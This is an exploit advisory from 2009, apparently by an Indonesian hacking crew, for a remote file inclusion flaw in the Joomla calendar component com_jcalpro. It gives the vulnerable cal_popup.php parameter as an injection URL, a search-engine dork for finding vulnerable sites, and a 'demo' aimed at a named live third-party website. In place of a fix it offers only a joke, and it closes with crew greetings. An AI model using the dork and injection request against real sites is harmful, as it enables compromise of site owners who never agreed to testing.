#############################################################################################################
## Joomla Component com_jcalpro Remote FiLe include RFI ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 13 December, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.anything-digital.com
[+] Download : http://dev.anything-digital.com/jcal-pro-downloads.html
[+] version : 1.5.3.6 Stable or upper / lower maybe also affected
[+] Vulnerability : RFI
[+] Dork : inurl:”com_jcalpro”
[+] LOCATION : INDONESIA – JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[INDONESIANCODER]

[ BUG ]

cal_popup.php

[ DEMO ]

http://www.perovec96.ru/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[kaMtiEzROX]

[ FIX ]

tanya aurakasih mungkin dia tauh :”>

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Setelah Bertapa kagak jelas ampe pagi sama Om Don Tukuesto … dan lagi lagi akhirnya nemu lobang :D
[+] iseng2 berhadiah bugs .. omegod >.<
[+] capek juga dari surabaya .. fyuh .,.

[ QUOTE ]

[+] one day .. u will be mind .. >.<
[+] AURAKASIH u are so .. hha